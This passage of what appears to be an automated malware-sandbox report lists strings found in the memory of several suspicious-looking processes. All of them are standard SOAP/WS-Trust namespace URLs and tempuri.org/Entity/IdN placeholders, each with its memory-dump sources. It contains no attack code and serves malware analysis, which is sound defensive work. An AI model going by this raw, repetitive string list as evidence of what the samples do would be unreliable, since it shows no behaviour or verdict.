                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                                Source: newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097878074.0000027EC173A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100987083.0000027EC1765000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098268964.0000027EC1742000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100855946.0000027EC1743000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                                Source: svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc~
                                Source: svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuerf
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103455410.0000027EC0ECA000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                                Source: svchost.exe, 0000000D.00000003.4100987083.0000027EC1765000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustbc
                                Source: svchost.exe, 0000000D.00000003.4100987083.0000027EC1765000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustv
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4148631852.0000000005A71000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4552683302.0000000005971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.000000000343D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002D49000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003449000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
